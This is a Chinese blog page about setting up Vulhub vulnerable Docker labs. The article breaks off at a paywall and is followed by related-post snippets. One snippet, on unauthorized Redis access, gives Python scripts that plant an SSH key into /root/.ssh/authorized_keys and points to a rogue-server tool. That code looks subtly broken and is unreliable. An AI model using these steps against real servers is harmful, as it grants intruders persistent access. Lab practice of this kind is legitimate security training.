Vulhub 漏洞环境复现环境

已于 2022-05-20 12:10:07 修改
阅读量1k 收藏 1
点赞数
分类专栏: 靶场 文章标签: docker 容器 nginx 漏洞复现
于 2022-05-20 12:09:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wang_624/article/details/124880921
版权

Vulhub 简介

漏洞复现不用愁

展示

Vulhub 是预先构建的易受攻击的 docker 环境的开源集合。不需要已有的 docker 知识,只需执行两个简单的命令,您就有了一个易受攻击的环境。

请添加图片描述

安装

在 Ubuntu 20.04 上安装 docker/docker-compose:

# 安装pip
curl -s https://bootstrap.pypa.io/get-pip.py | python3

# 安装最新版docker
curl -s https://get.docker.com/ | sh

# 运行docker服务
systemctl start docker

# 安装 docker compose
pip install docker-compose

其他系统安装方法可参考官方文档:https://docs.docker.com/

用法

复现 nginx 解析漏洞

进入vulhub-master的nginx/nginx_parsing_vulnerability目录下,除了环境之外还有复现过程

请添加图片描述

根据操作步骤

docker-compose up -d 启动容器

最低0.47元/天 解锁文章
vulhub漏洞复现
qq_30854761的博客
04-26 4280
下载镜像 1 docker pull medicean/vulapps:s_shiro_1 直接运行镜像,将docker的8080端口映射到本地的 8080上 1 docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1 获取复现需要用到的ysoserial工具 若无mvn则自行下载安装 1 2 3 git clone..
Vulhub漏洞复现环境搭建流程
流水不争先,争的是滔滔不绝
03-31 691
Vulhub漏洞环境搭建完整流程
Vulhub漏洞复现
weixin_45995579的博客
09-30 1860
蔚莱. 1.环境搭建 下载vulhub压缩包,解压到Ubuntu16.04系统下。 进入到Tomcat put 漏洞对应的CVE漏洞编号/vulhub-master/httpd/ssi-rce路径下,执行如下两条命令: docker-compose build docker-compose up -d 网站的配置文件在当前路径下的docker-compose.yml文件内: 【注】:CVE漏洞环境默认开启的端口是8080,当要同时开启多个CVE漏洞环境时需要
Kali 搭建Vulhub靶场 (详细)
qq_43508668的博客
04-21 1714
这里写目录标题安装Docker安装pip安装docker-compose下载Vulhub 安装Docker 检查软件更新 apt-get update 安装https协议、CA证书 apt-get install -y apt-transport-https ca-certificates 安装docker apt install docker.io docker -v 查看是否安装成功 启动docker systemctl start docker 显示docker信息 docker ps -
vulhub漏洞复现73_Webmin
weixin_44193247的博客
02-13 419
vulhub漏洞复现练习篇
vulhub漏洞复现1
xhscxj的博客
05-23 2067
CVE-2018-18778 CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 影响版本:ACME mini_httpd before 1.30 分析 当mini_httpd开启虚拟主机时,此
基于vulhub平台的漏洞复现环境Dockerfile设计源码
10-02
该项目是针对Vulhub平台的漏洞复现环境设计的Dockerfile源码,包含2043个文件,涵盖多种编程语言和文件类型,其中包含495个PNG图片文件、399个Markdown文件、260个YAML文件、83个Java源文件、82个Python脚本文件、73...
vulhub-spring漏洞复现
qq_51922767的博客
09-14 2926
vulhub-spring漏洞复现
Vulhub复现fastjson漏洞
人若有志,就不会在半坡停止。
11-08 1125
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为Java对象,Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。
vulhub靶场Webmin(CVE-2019-15107)漏洞复现
weixin_45095113的博客
12-12 920
Webmin(CVE-2019-15107)漏洞复现
(四)vulhub专栏:Struct2漏洞复现汇总(持续更新中...)
云舒的博客
07-12 2224
Struct2漏洞复现汇总
vulhub搭建漏洞复现
weixin_46094434的博客
03-04 468
是一个用来定义和运行复杂应用的Docker工具。一个使用Docke容器的应用,通常由多个容器组成。使用Docker Compose不在需要使用shell脚本来启动容器。命令用于升级 setuptools 库的版本。setuptools 是 Python 的一个开源包管理器,它用于管理 Python 项目的依赖库。命令时,它会更新 setuptools 库的版本,并应用任何新的修复程序或改进。这通常可以解决由于版本不兼容而导致的一些问题。5.下载后进入Vulhub。进入后打开容器开启靶场。
CVE-2018-1058(远程代码执行漏洞vulhub复现
qq_52279315的博客
05-17 386
vulhub靶场复现【postgresql】
vulhub漏洞复现51_PHP
weixin_44193247的博客
02-11 1049
vulhub漏洞复现练习篇
vulhub漏洞复现66_Spring
weixin_44193247的博客
02-13 1250
vulhub漏洞复现练习篇
利用Vulnhub复现漏洞 - Apache HTTPD 换行解析漏洞(CVE-2017-15715)
JiangBuLiu的博客
06-27 1483
Apache HTTPD 换行解析漏洞(CVE-2017-15715)Vulnhub官方复现教程背景简述漏洞详情复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/httpd/CVE-2017-15715/ 背景简述 Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。 漏洞详情 其2.4.0...
漏洞复现环境集锦-Vulhub
y@n1n的博客
04-29 678
一.简介: Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。 二.安装Vulhub漏洞环境的搭建,官方推荐用ubuntu) 1.安装...
vulhub漏洞erdis复现
最新发布
02-11
### 复现Redis漏洞 #### 准备工作 为了在Vulhub平台上复现Redis未授权访问漏洞,需先搭建好环境。通过克隆[Vulhub](https://github.com/vulhub/vulhub)仓库并进入`redis/unauthorized`目录来启动含有该漏洞的服务实例[^1]。 ```bash git clone https://github.com/vulhub/vulhub.git cd vulhub/redis/unauthorized docker-compose up -d ``` 上述命令会拉取必要的Docker镜像并启动容器,模拟存在此安全风险的Redis服务部署场景[^4]。 #### 验证漏洞 一旦服务正常运行,可以通过尝试连接至Redis服务器验证是否存在未授权访问问题: ```bash redis-cli -h <target_ip> ``` 如果能够成功建立连接而无需提供任何凭证,则表明确实存在未授权访问的风险。此时应该可以看到类似如下提示信息,表示已经进入了交互式的Redis命令行界面[^2]。 #### 利用漏洞 对于教育目的而言,下面将以一种较为温和的方式展示可能造成的危害——向目标主机植入SSH密钥对以便后续远程登录测试(请注意仅限于实验环境中操作): 首先准备一个恶意脚本用于触发Redis配置更改行为,例如创建名为`exploit.py`文件内容如下所示: ```python import redis r = redis.Redis(host='<target_ip>', port=6379, db=0) with open('/tmp/id_rsa.pub', 'rb') as f: pub_key = f.read().decode() cmd = "set crackit {}\nsave\n".format(pub_key).encode() r.execute_command('EVAL', cmd.decode(), 0) ``` 接着编写另一个Python脚本来实现将公钥保存到指定位置的功能,命名为`write_sshkey_to_redis.py`: ```python import os from pathlib import Path Path("/root/.ssh").mkdir(parents=True, exist_ok=True) os.system("echo '{}' >> /root/.ssh/authorized_keys".format(input())) ``` 最后利用第三方工具如[nobodyCN开发的redis-rogue-server](https://github.com/n0b0dyCN/redis-rogue-server),按照其README文档指导完成整个攻击链路构建过程[^3]。 需要注意的是以上步骤仅为理论讲解和技术交流之用,请勿非法入侵他人计算机信息系统!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值